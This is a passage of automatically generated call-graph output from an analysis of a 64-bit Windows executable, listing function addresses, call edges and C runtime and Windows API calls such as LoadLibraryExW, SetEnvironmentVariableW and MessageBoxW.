7ff67a6034c0 15290->15482 15291->15277 15292 7ff67a603b23 15292->15262 15293 7ff67a603b28 15292->15293 15572 7ff67a61028c 15293->15572 15299 7ff67a603c66 15305 7ff67a603ca8 15299->15305 15630 7ff67a601ef0 15299->15630 15300 7ff67a603c49 15304 7ff67a606850 FreeLibrary 15300->15304 15304->15314 15305->15277 15634 7ff67a603460 15305->15634 15307 7ff67a603d20 15490 7ff67a607fe0 15307->15490 15312 7ff67a603d33 15315 7ff67a607b70 61 API calls 15312->15315 15313 7ff67a603ce1 15317 7ff67a606850 FreeLibrary 15313->15317 15314->15290 15314->15299 15316 7ff67a603d3f 15315->15316 15497 7ff67a608090 15316->15497 15317->15277 15324 7ff67a61a1d3 15323->15324 15325 7ff67a61a1f4 15323->15325 15324->15223 18275 7ff67a61aa68 15325->18275 15328 7ff67a60c80c GetModuleHandleW 15329 7ff67a60c81d 15328->15329 15329->15231 15332 7ff67a60c4f1 15330->15332 15331 7ff67a60c2a0 15331->15221 15332->15331 15333 7ff67a60da98 __scrt_initialize_crt 7 API calls 15332->15333 15333->15331 15335 7ff67a60c6a2 _wfindfirst32i64 __scrt_get_show_window_mode 15334->15335 15336 7ff67a60c6c1 RtlCaptureContext RtlLookupFunctionEntry 15335->15336 15337 7ff67a60c726 __scrt_get_show_window_mode 15336->15337 15338 7ff67a60c6ea RtlVirtualUnwind 15336->15338 15339 7ff67a60c758 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 15337->15339 15338->15337 15340 7ff67a60c7aa _wfindfirst32i64 15339->15340 15340->15219 15342 7ff67a60c36e __scrt_dllmain_crt_thread_attach 15341->15342 15342->15237 15342->15238 15344 7ff67a60daaa 15343->15344 15345 7ff67a60daa0 15343->15345 15344->15237 15349 7ff67a60de14 15345->15349 15350 7ff67a60daa5 15349->15350 15351 7ff67a60de23 15349->15351 15353 7ff67a60de80 15350->15353 15357 7ff67a60e050 15351->15357 15354 7ff67a60deab 15353->15354 15355 7ff67a60de8e DeleteCriticalSection 15354->15355 15356 7ff67a60deaf 15354->15356 15355->15354 15356->15344 15361 7ff67a60deb8 15357->15361 15362 7ff67a60dfd2 TlsFree 15361->15362 15368 7ff67a60defc __vcrt_InitializeCriticalSectionEx 15361->15368 15363 7ff67a60df2a LoadLibraryExW 15365 7ff67a60df4b GetLastError 15363->15365 15366 7ff67a60dfa1 15363->15366 15364 7ff67a60dfc1 GetProcAddress 15364->15362 15365->15368 15366->15364 15367 7ff67a60dfb8 FreeLibrary 15366->15367 15367->15364 15368->15362 15368->15363 15368->15364 15369 7ff67a60df6d LoadLibraryExW 15368->15369 15369->15366 15369->15368 15371 7ff67a60d1c0 15370->15371 15371->15242 15371->15371 15373 7ff67a6087cf 15372->15373 15374 7ff67a6087d7 __vcrt_freefls 15373->15374 15375 7ff67a608820 WideCharToMultiByte 15373->15375 15377 7ff67a6088c6 15373->15377 15378 7ff67a608874 WideCharToMultiByte 15373->15378 15374->15246 15375->15373 15375->15377 15668 7ff67a6029e0 15377->15668 15378->15373 15378->15377 15380 7ff67a620150 15379->15380 15382 7ff67a6201f6 15380->15382 15383 7ff67a6201a3 15380->15383 15381 7ff67a61aed8 _invalid_parameter_noinfo 37 API calls 15385 7ff67a6201cc 15381->15385 16173 7ff67a620028 15382->16173 15383->15381 15385->15248 15387 7ff67a601ec5 15386->15387 15388 7ff67a601ee0 15387->15388 16181 7ff67a602890 15387->16181 15388->15277 15390 7ff67a603ed0 15388->15390 15391 7ff67a60bd60 15390->15391 15392 7ff67a603edc GetModuleFileNameW 15391->15392 15393 7ff67a603f22 15392->15393 15394 7ff67a603f0b 15392->15394 16221 7ff67a608cf0 15393->16221 15395 7ff67a6029e0 57 API calls 15394->15395 15397 7ff67a603f1e 15395->15397 15399 7ff67a60bdc0 _wfindfirst32i64 8 API calls 15397->15399 15401 7ff67a603f5f 15399->15401 15400 7ff67a602b30 59 API calls 15400->15397 15401->15254 15403 7ff67a607b7a 15402->15403 15404 7ff67a608be0 57 API calls 15403->15404 15405 7ff67a607b9c GetEnvironmentVariableW 15404->15405 15406 7ff67a607bb4 ExpandEnvironmentStringsW 15405->15406 15407 7ff67a607c06 15405->15407 15408 7ff67a608cf0 59 API calls 15406->15408 15409 7ff67a60bdc0 _wfindfirst32i64 8 API calls 15407->15409 15410 7ff67a607bdc 15408->15410 15411 7ff67a607c18 15409->15411 15410->15407 15412 7ff67a607be6 15410->15412 15411->15256 16232 7ff67a61aa9c 15412->16232 15415 7ff67a60bdc0 _wfindfirst32i64 8 API calls 15416 7ff67a607bfe 15415->15416 15416->15256 15418 7ff67a608be0 57 API calls 15417->15418 15419 7ff67a608067 SetEnvironmentVariableW 15418->15419 15420 7ff67a60807f __vcrt_freefls 15419->15420 15420->15259 15422 7ff67a601cbe 15421->15422 15423 7ff67a601ef0 49 API calls 15422->15423 15424 7ff67a601cf4 15423->15424 15425 7ff67a601ef0 49 API calls 15424->15425 15435 7ff67a601dde 15424->15435 15426 7ff67a601d1a 15425->15426 15426->15435 16239 7ff67a601aa0 15426->16239 15427 7ff67a60bdc0 _wfindfirst32i64 8 API calls 15428 7ff67a601e6c 15427->15428 15428->15262 15428->15264 15432 7ff67a601dcc 15433 7ff67a603e50 49 API calls 15432->15433 15433->15435 15434 7ff67a601d8f 15434->15432 15436 7ff67a601e34 15434->15436 15435->15427 15437 7ff67a603e50 49 API calls 15436->15437 15438 7ff67a601e41 15437->15438 16275 7ff67a604060 15438->16275 15441 7ff67a608995 15440->15441 16317 7ff67a608660 GetCurrentProcess OpenProcessToken 15441->16317 15444 7ff67a608660 7 API calls 15445 7ff67a6089c1 15444->15445 15446 7ff67a6089da 15445->15446 15447 7ff67a6089f4 15445->15447 16327 7ff67a608750 15446->16327 15449 7ff67a608750 48 API calls 15447->15449 15451 7ff67a608a07 LocalFree LocalFree 15449->15451 15452 7ff67a608a23 15451->15452 15454 7ff67a608a2f 15451->15454 16331 7ff67a602c50 15452->16331 15455 7ff67a60bdc0 _wfindfirst32i64 8 API calls 15454->15455 15456 7ff67a603b6e 15455->15456 15456->15279 15457 7ff67a6014f0 15456->15457 15458 7ff67a60157f 15457->15458 15460 7ff67a601506 15457->15460 15458->15285 16538 7ff67a607960 15460->16538 15465 7ff67a608c87 MultiByteToWideChar 15464->15465 15466 7ff67a608c01 MultiByteToWideChar 15464->15466 15467 7ff67a608caa 15465->15467 15468 7ff67a608ccf 15465->15468 15469 7ff67a608c27 15466->15469 15472 7ff67a608c4c 15466->15472 15470 7ff67a6029e0 55 API calls 15467->15470 15468->15274 15471 7ff67a6029e0 55 API calls 15469->15471 15473 7ff67a608cbd 15470->15473 15474 7ff67a608c3a 15471->15474 15472->15465 15475 7ff67a608c62 15472->15475 15473->15274 15474->15274 15476 7ff67a6029e0 55 API calls 15475->15476 15477 7ff67a608c75 15476->15477 15477->15274 15479 7ff67a606e05 15478->15479 15480 7ff67a603c00 15479->15480 15481 7ff67a602890 59 API calls 15479->15481 15480->15314 15585 7ff67a606aa0 15480->15585 15481->15480 15486 7ff67a603533 15482->15486 15488 7ff67a603574 15482->15488 15483 7ff67a60bdc0 _wfindfirst32i64 8 API calls 15484 7ff67a6035c5 15483->15484 15484->15277 15489 7ff67a608950 LocalFree 15484->15489 15486->15488 16870 7ff67a601710 15486->16870 16912 7ff67a602d70 15486->16912 15488->15483 15489->15307 15491 7ff67a608be0 57 API calls 15490->15491 15492 7ff67a607fff 15491->15492 15493 7ff67a608be0 57 API calls 15492->15493 15494 7ff67a60800f 15493->15494 15495 7ff67a617eec 38 API calls 15494->15495 15496 7ff67a60801d __vcrt_freefls 15495->15496 15496->15312 15498 7ff67a6080a0 15497->15498 15499 7ff67a608be0 57 API calls 15498->15499 15541 7ff67a602b50 15540->15541 15542 7ff67a614bc4 49 API calls 15541->15542 15543 7ff67a602b9b __scrt_get_show_window_mode 15542->15543 15544 7ff67a608be0 57 API calls 15543->15544 15545 7ff67a602bd0 15544->15545 15546 7ff67a602bd5 15545->15546 15547 7ff67a602c0d MessageBoxA 15545->15547 15548 7ff67a608be0 57 API calls 15546->15548 15549 7ff67a602c27 15547->15549 15550 7ff67a602bef MessageBoxW 15548->15550 15551 7ff67a60bdc0 _wfindfirst32i64 8 API calls 15549->15551 15550->15549 15552 7ff67a602c37 15551->15552 15552->15277 15554 7ff67a603fec 15553->15554 15555 7ff67a608be0 57 API calls 15554->15555 15556 7ff67a604017 15555->15556 15557 7ff67a608be0 57 API calls 15556->15557 15558 7ff67a60402a 15557->15558 17451 7ff67a6165a8 15558->17451 15561 7ff67a60bdc0 _wfindfirst32i64 8 API calls 15562 7ff67a603aed 15561->15562 15562->15286 15563 7ff67a6082c0 15562->15563 15564 7ff67a6082e4 15563->15564 15565 7ff67a6083bb __vcrt_freefls 15564->15565 15566 7ff67a610914 73 API calls 15564->15566 15565->15292 15567 7ff67a6082fe 15566->15567 15567->15565 17830 7ff67a619170 15567->17830 15573 7ff67a6102bc 15572->15573 17845 7ff67a610068 15573->17845 15577 7ff67a60bdc9 15576->15577 15578 7ff67a603b93 15577->15578 15579 7ff67a60be20 IsProcessorFeaturePresent 15577->15579 15578->15328 15580 7ff67a60be38 15579->15580 17856 7ff67a60c014 RtlCaptureContext 15580->17856 15586 7ff67a606ac3 15585->15586 15587 7ff67a606ada 15585->15587 15586->15587 17861 7ff67a6015a0 15586->17861 15587->15288 15589 7ff67a606ae4 15589->15587 15590 7ff67a604060 49 API calls 15589->15590 15592 7ff67a606b45 15590->15592 15591 7ff67a602b30 59 API calls 15591->15587 15592->15591 15593 7ff67a606bb5 memcpy_s __vcrt_freefls 15592->15593 15593->15288 15607 7ff67a60661a memcpy_s 15594->15607 15596 7ff67a60673f 15598 7ff67a604060 49 API calls 15596->15598 15597 7ff67a60675b 15599 7ff67a602b30 59 API calls 15597->15599 15600 7ff67a6067b8 15598->15600 15604 7ff67a606751 __vcrt_freefls 15599->15604 15603 7ff67a604060 49 API calls 15600->15603 15601 7ff67a604060 49 API calls 15601->15607 15602 7ff67a606720 15602->15596 15605 7ff67a604060 49 API calls 15602->15605 15606 7ff67a6067e8 15603->15606 15608 7ff67a60bdc0 _wfindfirst32i64 8 API calls 15604->15608 15605->15596 15610 7ff67a604060 49 API calls 15606->15610 15607->15596 15607->15597 15607->15601 15607->15602 15607->15607 15611 7ff67a601710 135 API calls 15607->15611 15612 7ff67a606741 15607->15612 17885 7ff67a601950 15607->17885 15609 7ff67a603c26 15608->15609 15609->15300 15614 7ff67a606580 15609->15614 15610->15604 15611->15607 15613 7ff67a602b30 59 API calls 15612->15613 15613->15604 17889 7ff67a608270 15614->17889 15616 7ff67a60659c 15617 7ff67a608270 58 API calls 15616->15617 15618 7ff67a6065af 15617->15618 15619 7ff67a6065e5 15618->15619 15620 7ff67a6065c7 15618->15620 15621 7ff67a602b30 59 API calls 15619->15621 17893 7ff67a606f00 GetProcAddress 15620->17893 15623 7ff67a603c34 15621->15623 15623->15300 15631 7ff67a601f15 15630->15631 15632 7ff67a614bc4 49 API calls 15631->15632 15633 7ff67a601f38 15632->15633 15633->15305 17952 7ff67a605bd0 15634->17952 15637 7ff67a6034ad 15637->15313 15687 7ff67a60bd60 15668->15687 15671 7ff67a602a29 15689 7ff67a614bc4 15671->15689 15676 7ff67a601ef0 49 API calls 15677 7ff67a602a86 __scrt_get_show_window_mode 15676->15677 15678 7ff67a608be0 54 API calls 15677->15678 15679 7ff67a602abb 15678->15679 15680 7ff67a602ac0 15679->15680 15681 7ff67a602af8 MessageBoxA 15679->15681 15683 7ff67a608be0 54 API calls 15680->15683 15682 7ff67a602b12 15681->15682 15685 7ff67a60bdc0 _wfindfirst32i64 8 API calls 15682->15685 15684 7ff67a602ada MessageBoxW 15683->15684 15684->15682 15686 7ff67a602b22 15685->15686 15686->15374 15688 7ff67a6029fc GetLastError 15687->15688 15688->15671 15691 7ff67a614c1e 15689->15691 15690 7ff67a614c43 15719 7ff67a61aed8 15690->15719 15691->15690 15692 7ff67a614c7f 15691->15692 15727 7ff67a612e50 15692->15727 15695 7ff67a614c6d 15697 7ff67a60bdc0 _wfindfirst32i64 8 API calls 15695->15697 15696 7ff67a614d5c 15698 7ff67a61b00c __free_lconv_num 11 API calls 15696->15698 15700 7ff67a602a57 15697->15700 15698->15695 15707 7ff67a608570 15700->15707 15701 7ff67a614d80 15701->15696 15703 7ff67a614d8a 15701->15703 15702 7ff67a614d31 15741 7ff67a61b00c 15702->15741 15706 7ff67a61b00c __free_lconv_num 11 API calls 15703->15706 15705 7ff67a614d28 15705->15696 15705->15702 15706->15695 15708 7ff67a60857c 15707->15708 15709 7ff67a608597 GetLastError 15708->15709 15710 7ff67a60859d FormatMessageW 15708->15710 15709->15710 15711 7ff67a6085ec WideCharToMultiByte 15710->15711 15712 7ff67a6085d0 15710->15712 15714 7ff67a608626 15711->15714 15715 7ff67a6085e3 15711->15715 15713 7ff67a6029e0 54 API calls 15712->15713 15713->15715 15716 7ff67a6029e0 54 API calls 15714->15716 15717 7ff67a60bdc0 _wfindfirst32i64 8 API calls 15715->15717 15716->15715 15718 7ff67a602a5e 15717->15718 15718->15676 15747 7ff67a61ac20 15719->15747 15722 7ff67a61af13 15722->15695 15728 7ff67a612e8e 15727->15728 15729 7ff67a612e7e 15727->15729 15730 7ff67a612e97 15728->15730 15735 7ff67a612ec5 15728->15735 15733 7ff67a61aed8 _invalid_parameter_noinfo 37 API calls 15729->15733 15731 7ff67a61aed8 _invalid_parameter_noinfo 37 API calls 15730->15731 15732 7ff67a612ebd 15731->15732 15732->15696 15732->15701 15732->15702 15732->15705 15733->15732 15735->15729 15735->15732 15737 7ff67a613174 15735->15737 15839 7ff67a6137e0 15735->15839 15865 7ff67a6134a8 15735->15865 15895 7ff67a612d30 15735->15895 15898 7ff67a614a00 15735->15898 15739 7ff67a61aed8 _invalid_parameter_noinfo 37 API calls 15737->15739 15739->15729 15742 7ff67a61b040 15741->15742 15743 7ff67a61b011 RtlFreeHeap 15741->15743 15742->15695 15743->15742 15744 7ff67a61b02c GetLastError 15743->15744 15745 7ff67a61b039 __free_lconv_num 15744->15745 15746 7ff67a6155c4 _findclose 9 API calls 15745->15746 15746->15742 15748 7ff67a61ac77 15747->15748 15749 7ff67a61ac3c GetLastError 15747->15749 15748->15722 15753 7ff67a61ac8c 15748->15753 15750 7ff67a61ac4c 15749->15750 15760 7ff67a61ba50 15750->15760 15754 7ff67a61aca8 GetLastError SetLastError 15753->15754 15755 7ff67a61acc0 15753->15755 15754->15755 15755->15722 15756 7ff67a61afc4 IsProcessorFeaturePresent 15755->15756 15757 7ff67a61afd7 15756->15757 15831 7ff67a61acd8 15757->15831 15761 7ff67a61ba8a FlsSetValue 15760->15761 15762 7ff67a61ba6f FlsGetValue 15760->15762 15764 7ff67a61ba97 15761->15764 15765 7ff67a61ac67 SetLastError 15761->15765 15763 7ff67a61ba84 15762->15763 15762->15765 15763->15761 15777 7ff67a61f258 15764->15777 15765->15748 15768 7ff67a61bac4 FlsSetValue 15771 7ff67a61bad0 FlsSetValue 15768->15771 15772 7ff67a61bae2 15768->15772 15769 7ff67a61bab4 FlsSetValue 15770 7ff67a61babd 15769->15770 15774 7ff67a61b00c __free_lconv_num 11 API calls 15770->15774 15771->15770 15784 7ff67a61b5b8 15772->15784 15774->15765 15778 7ff67a61f269 _findclose 15777->15778 15779 7ff67a61f2ba 15778->15779 15780 7ff67a61f29e HeapAlloc 15778->15780 15789 7ff67a623d00 15778->15789 15792 7ff67a6155c4 15779->15792 15780->15778 15781 7ff67a61baa6 15780->15781 15781->15768 15781->15769 15817 7ff67a61b490 15784->15817 15795 7ff67a623d40 15789->15795 15800 7ff67a61b988 GetLastError 15792->15800 15794 7ff67a6155cd 15794->15781 15796 7ff67a620db8 _isindst EnterCriticalSection 15795->15796 15797 7ff67a623d4d 15796->15797 15798 7ff67a620e18 _isindst LeaveCriticalSection 15797->15798 15799 7ff67a623d12 15798->15799 15799->15778 15801 7ff67a61b9c9 FlsSetValue 15800->15801 15802 7ff67a61b9ac 15800->15802 15803 7ff67a61b9b9 15801->15803 15804 7ff67a61b9db 15801->15804 15802->15801 15802->15803 15805 7ff67a61ba35 SetLastError 15803->15805 15806 7ff67a61f258 _findclose 5 API calls 15804->15806 15805->15794 15807 7ff67a61b9ea 15806->15807 15808 7ff67a61ba08 FlsSetValue 15807->15808 15809 7ff67a61b9f8 FlsSetValue 15807->15809 15811 7ff67a61ba26 15808->15811 15812 7ff67a61ba14 FlsSetValue 15808->15812 15810 7ff67a61ba01 15809->15810 15813 7ff67a61b00c __free_lconv_num 5 API calls 15810->15813 15814 7ff67a61b5b8 _findclose 5 API calls 15811->15814 15812->15810 15813->15803 15815 7ff67a61ba2e 15814->15815 15816 7ff67a61b00c __free_lconv_num 5 API calls 15815->15816 15816->15805 15829 7ff67a620db8 EnterCriticalSection 15817->15829 15832 7ff67a61ad12 _wfindfirst32i64 __scrt_get_show_window_mode 15831->15832 15833 7ff67a61ad3a RtlCaptureContext RtlLookupFunctionEntry 15832->15833 15834 7ff67a61adaa IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 15833->15834 15835 7ff67a61ad74 RtlVirtualUnwind 15833->15835 15836 7ff67a61adfc _wfindfirst32i64 15834->15836 15835->15834 15837 7ff67a60bdc0 _wfindfirst32i64 8 API calls 15836->15837 15838 7ff67a61ae1b GetCurrentProcess TerminateProcess 15837->15838 15840 7ff67a613822 15839->15840 15841 7ff67a613895 15839->15841 15842 7ff67a613828 15840->15842 15843 7ff67a6138bf 15840->15843 15844 7ff67a61389a 15841->15844 15845 7ff67a6138ef 15841->15845 15850 7ff67a61382d 15842->15850 15854 7ff67a6138fe 15842->15854 15922 7ff67a611d90 15843->15922 15846 7ff67a61389c 15844->15846 15847 7ff67a6138cf 15844->15847 15845->15843 15845->15854 15856 7ff67a613858 15845->15856 15849 7ff67a61383d 15846->15849 15853 7ff67a6138ab 15846->15853 15929 7ff67a611980 15847->15929 15864 7ff67a61392d 15849->15864 15904 7ff67a614144 15849->15904 15850->15849 15855 7ff67a613870 15850->15855 15850->15856 15853->15843 15858 7ff67a6138b0 15853->15858 15854->15864 15936 7ff67a6121a0 15854->15936 15855->15864 15914 7ff67a614600 15855->15914 15856->15864 15943 7ff67a61ef18 15856->15943 15858->15864 15918 7ff67a614798 15858->15918 15860 7ff67a60bdc0 _wfindfirst32i64 8 API calls 15862 7ff67a613bc3 15860->15862 15862->15735 15864->15860 15866 7ff67a6134c9 15865->15866 15867 7ff67a6134b3 15865->15867 15870 7ff67a61aed8 _invalid_parameter_noinfo 37 API calls 15866->15870 15883 7ff67a613507 15866->15883 15868 7ff67a613822 15867->15868 15869 7ff67a613895 15867->15869 15867->15883 15871 7ff67a613828 15868->15871 15872 7ff67a6138bf 15868->15872 15873 7ff67a61389a 15869->15873 15876 7ff67a6138ef 15869->15876 15870->15883 15878 7ff67a61382d 15871->15878 15880 7ff67a6138fe 15871->15880 15877 7ff67a611d90 38 API calls 15872->15877 15874 7ff67a61389c 15873->15874 15875 7ff67a6138cf 15873->15875 15879 7ff67a61383d 15874->15879 15886 7ff67a6138ab 15874->15886 15881 7ff67a611980 38 API calls 15875->15881 15876->15872 15876->15880 15893 7ff67a613858 15876->15893 15877->15893 15878->15879 15884 7ff67a613870 15878->15884 15878->15893 15882 7ff67a614144 47 API calls 15879->15882 15894 7ff67a61392d 15879->15894 15885 7ff67a6121a0 38 API calls 15880->15885 15880->15894 15881->15893 15882->15893 15883->15735 15887 7ff67a614600 47 API calls 15884->15887 15884->15894 15885->15893 15886->15872 15888 7ff67a6138b0 15886->15888 15887->15893 15890 7ff67a614798 37 API calls 15888->15890 15888->15894 15889 7ff67a60bdc0 _wfindfirst32i64 8 API calls 15891 7ff67a613bc3 15889->15891 15890->15893 15891->15735 15892 7ff67a61ef18 47 API calls 15892->15893 15893->15892 15893->15894 15894->15889 16101 7ff67a610f54 15895->16101 15899 7ff67a614a17 15898->15899 16118 7ff67a61e078 15899->16118 15905 7ff67a614166 15904->15905 15953 7ff67a610dc0 15905->15953 15909 7ff67a6142a3 15912 7ff67a614a00 45 API calls 15909->15912 15913 7ff67a61432c 15909->15913 15911 7ff67a614a00 45 API calls 15911->15909 15912->15913 15913->15856 15915 7ff67a614618 15914->15915 15917 7ff67a614680 15914->15917 15916 7ff67a61ef18 47 API calls 15915->15916 15915->15917 15916->15917 15917->15856 15921 7ff67a6147b9 15918->15921 15919 7ff67a61aed8 _invalid_parameter_noinfo 37 API calls 15920 7ff67a6147ea 15919->15920 15920->15856 15921->15919 15921->15920 15923 7ff67a611dc3 15922->15923 15924 7ff67a611df2 15923->15924 15926 7ff67a611eaf 15923->15926 15925 7ff67a610dc0 12 API calls 15924->15925 15928 7ff67a611e2f 15924->15928 15925->15928 15927 7ff67a61aed8 _invalid_parameter_noinfo 37 API calls 15926->15927 15927->15928 15928->15856 15930 7ff67a6119b3 15929->15930 15931 7ff67a6119e2 15930->15931 15933 7ff67a611a9f 15930->15933 15932 7ff67a610dc0 12 API calls 15931->15932 15935 7ff67a611a1f 15931->15935 15932->15935 15934 7ff67a61aed8 _invalid_parameter_noinfo 37 API calls 15933->15934 15934->15935 15935->15856 15937 7ff67a6121d3 15936->15937 15938 7ff67a612202 15937->15938 15940 7ff67a6122bf 15937->15940 15939 7ff67a610dc0 12 API calls 15938->15939 15942 7ff67a61223f 15938->15942 15939->15942 15941 7ff67a61aed8 _invalid_parameter_noinfo 37 API calls 15940->15941 15941->15942 15942->15856 15944 7ff67a61ef40 15943->15944 15945 7ff67a614a00 45 API calls 15944->15945 15947 7ff67a61ef85 15944->15947 15948 7ff67a61ef45 __scrt_get_show_window_mode 15944->15948 15952 7ff67a61ef6e __scrt_get_show_window_mode 15944->15952 15945->15947 15946 7ff67a61aed8 _invalid_parameter_noinfo 37 API calls 15946->15948 15947->15948 15947->15952 16098 7ff67a6205c8 15947->16098 15948->15856 15952->15946 15952->15948 15954 7ff67a610de6 15953->15954 15955 7ff67a610df7 15953->15955 15961 7ff67a61ec30 15954->15961 15955->15954 15983 7ff67a61dcbc 15955->15983 15958 7ff67a610e38 15960 7ff67a61b00c __free_lconv_num 11 API calls 15958->15960 15959 7ff67a61b00c __free_lconv_num 11 API calls 15959->15958 15960->15954 15962 7ff67a61ec4d 15961->15962 15963 7ff67a61ec80 15961->15963 15964 7ff67a61aed8 _invalid_parameter_noinfo 37 API calls 15962->15964 15963->15962 15965 7ff67a61ecb2 15963->15965 15974 7ff67a614281 15964->15974 15970 7ff67a61edc5 15965->15970 15978 7ff67a61ecfa 15965->15978 15966 7ff67a61eeb7 16023 7ff67a61e11c 15966->16023 15968 7ff67a61ee7d 16016 7ff67a61e4b4 15968->16016 15970->15966 15970->15968 15971 7ff67a61ee4c 15970->15971 15972 7ff67a61ee0f 15970->15972 15975 7ff67a61ee05 15970->15975 16009 7ff67a61e794 15971->16009 15999 7ff67a61e9c4 15972->15999 15974->15909 15974->15911 15975->15968 15977 7ff67a61ee0a 15975->15977 15977->15971 15977->15972 15978->15974 15990 7ff67a61ab3c 15978->15990 15981 7ff67a61afc4 _wfindfirst32i64 17 API calls 15982 7ff67a61ef14 15981->15982 15984 7ff67a61dd07 15983->15984 15988 7ff67a61dccb _findclose 15983->15988 15985 7ff67a6155c4 _findclose 11 API calls 15984->15985 15987 7ff67a610e24 15985->15987 15986 7ff67a61dcee HeapAlloc 15986->15987 15986->15988 15987->15958 15987->15959 15988->15984 15988->15986 15989 7ff67a623d00 _findclose 2 API calls 15988->15989 15989->15988 15991 7ff67a61ab49 15990->15991 15992 7ff67a61ab53 15990->15992 15991->15992 15997 7ff67a61ab6e 15991->15997 15993 7ff67a6155c4 _findclose 11 API calls 15992->15993 15994 7ff67a61ab5a 15993->15994 16032 7ff67a61afa4 15994->16032 15996 7ff67a61ab66 15996->15974 15996->15981 15997->15996 15998 7ff67a6155c4 _findclose 11 API calls 15997->15998 15998->15994 16034 7ff67a62481c 15999->16034 16003 7ff67a61ea6c 16004 7ff67a61eac1 16003->16004 16006 7ff67a61ea8c 16003->16006 16008 7ff67a61ea70 16003->16008 16087 7ff67a61e5b0 16004->16087 16083 7ff67a61e86c 16006->16083 16008->15974 16010 7ff67a62481c 38 API calls 16009->16010 16011 7ff67a61e7de 16010->16011 16012 7ff67a624264 37 API calls 16011->16012 16013 7ff67a61e82e 16012->16013 16014 7ff67a61e832 16013->16014 16015 7ff67a61e86c 45 API calls 16013->16015 16014->15974 16015->16014 16017 7ff67a62481c 38 API calls 16016->16017 16018 7ff67a61e4ff 16017->16018 16019 7ff67a624264 37 API calls 16018->16019 16020 7ff67a61e557 16019->16020 16021 7ff67a61e55b 16020->16021 16022 7ff67a61e5b0 45 API calls 16020->16022 16021->15974 16022->16021 16024 7ff67a61e161 16023->16024 16025 7ff67a61e194 16023->16025 16026 7ff67a61aed8 _invalid_parameter_noinfo 37 API calls 16024->16026 16027 7ff67a61e1ac 16025->16027 16029 7ff67a61e22d 16025->16029 16031 7ff67a61e18d __scrt_get_show_window_mode 16026->16031 16028 7ff67a61e4b4 46 API calls 16027->16028 16028->16031 16030 7ff67a614a00 45 API calls 16029->16030 16029->16031 16030->16031 16031->15974 16033 7ff67a61ae3c _invalid_parameter_noinfo 37 API calls 16032->16033 16035 7ff67a62486f fegetenv 16034->16035 16036 7ff67a62877c 37 API calls 16035->16036 16041 7ff67a6248c2 16036->16041 16037 7ff67a6248ef 16040 7ff67a61ab3c __std_exception_copy 37 API calls 16037->16040 16038 7ff67a6249b2 16039 7ff67a62877c 37 API calls 16038->16039 16042 7ff67a6249dc 16039->16042 16044 7ff67a62496d 16040->16044 16041->16038 16045 7ff67a6248dd 16041->16045 16046 7ff67a62498c 16041->16046 16043 7ff67a62877c 37 API calls 16042->16043 16047 7ff67a6249ed 16043->16047 16048 7ff67a625a94 16044->16048 16053 7ff67a624975 16044->16053 16045->16037 16045->16038 16049 7ff67a61ab3c __std_exception_copy 37 API calls 16046->16049 16050 7ff67a628970 20 API calls 16047->16050 16051 7ff67a61afc4 _wfindfirst32i64 17 API calls 16048->16051 16049->16044 16060 7ff67a624a56 __scrt_get_show_window_mode 16050->16060 16052 7ff67a625aa9 16051->16052 16054 7ff67a60bdc0 _wfindfirst32i64 8 API calls 16053->16054 16055 7ff67a61ea11 16054->16055 16079 7ff67a624264 16055->16079 16056 7ff67a624dff __scrt_get_show_window_mode 16057 7ff67a62513f 16059 7ff67a624380 37 API calls 16057->16059 16058 7ff67a624a97 memcpy_s 16076 7ff67a6253db memcpy_s __scrt_get_show_window_mode 16058->16076 16078 7ff67a624ef3 memcpy_s __scrt_get_show_window_mode 16058->16078 16065 7ff67a625857 16059->16065 16060->16056 16060->16058 16063 7ff67a6155c4 _findclose 11 API calls 16060->16063 16061 7ff67a6250eb 16061->16057 16062 7ff67a625aac memcpy_s 37 API calls 16061->16062 16062->16057 16064 7ff67a624ed0 16063->16064 16066 7ff67a61afa4 _invalid_parameter_noinfo 37 API calls 16064->16066 16068 7ff67a625aac memcpy_s 37 API calls 16065->16068 16075 7ff67a6258b2 16065->16075 16066->16058 16067 7ff67a625a38 16070 7ff67a62877c 37 API calls 16067->16070 16068->16075 16069 7ff67a6155c4 11 API calls _findclose 16069->16078 16070->16053 16071 7ff67a6155c4 11 API calls _findclose 16071->16076 16072 7ff67a624380 37 API calls 16072->16075 16073 7ff67a61afa4 37 API calls _invalid_parameter_noinfo 16073->16078 16074 7ff67a625aac memcpy_s 37 API calls 16074->16075 16075->16067 16075->16072 16075->16074 16076->16057 16076->16061 16076->16071 16077 7ff67a61afa4 37 API calls _invalid_parameter_noinfo 16076->16077 16077->16076 16078->16061 16078->16069 16078->16073 16080 7ff67a624283 16079->16080 16081 7ff67a61aed8 _invalid_parameter_noinfo 37 API calls 16080->16081 16082 7ff67a6242ae memcpy_s 16080->16082 16081->16082 16082->16003 16082->16082 16084 7ff67a61e898 memcpy_s 16083->16084 16085 7ff67a614a00 45 API calls 16084->16085 16086 7ff67a61e952 memcpy_s __scrt_get_show_window_mode 16084->16086 16085->16086 16086->16008 16088 7ff67a61e5eb 16087->16088 16092 7ff67a61e638 memcpy_s 16087->16092 16089 7ff67a61aed8 _invalid_parameter_noinfo 37 API calls 16088->16089 16090 7ff67a61e617 16089->16090 16090->16008 16091 7ff67a61e6a3 16093 7ff67a61ab3c __std_exception_copy 37 API calls 16091->16093 16092->16091 16094 7ff67a614a00 45 API calls 16092->16094 16097 7ff67a61e6e5 memcpy_s 16093->16097 16094->16091 16095 7ff67a61afc4 _wfindfirst32i64 17 API calls 16096 7ff67a61e790 16095->16096 16097->16095 16100 7ff67a6205ec WideCharToMultiByte 16098->16100 16102 7ff67a610f81 16101->16102 16103 7ff67a610f93 16101->16103 16104 7ff67a6155c4 _findclose 11 API calls 16102->16104 16106 7ff67a610fa0 16103->16106 16109 7ff67a610fdd 16103->16109 16105 7ff67a610f86 16104->16105 16107 7ff67a61afa4 _invalid_parameter_noinfo 37 API calls 16105->16107 16108 7ff67a61aed8 _invalid_parameter_noinfo 37 API calls 16106->16108 16115 7ff67a610f91 16107->16115 16108->16115 16110 7ff67a611086 16109->16110 16111 7ff67a6155c4 _findclose 11 API calls 16109->16111 16112 7ff67a6155c4 _findclose 11 API calls 16110->16112 16110->16115 16113 7ff67a61107b 16111->16113 16114 7ff67a611130 16112->16114 16116 7ff67a61afa4 _invalid_parameter_noinfo 37 API calls 16113->16116 16117 7ff67a61afa4 _invalid_parameter_noinfo 37 API calls 16114->16117 16115->15735 16116->16110 16117->16115 16119 7ff67a614a3f 16118->16119 16120 7ff67a61e091 16118->16120 16122 7ff67a61e0e4 16119->16122 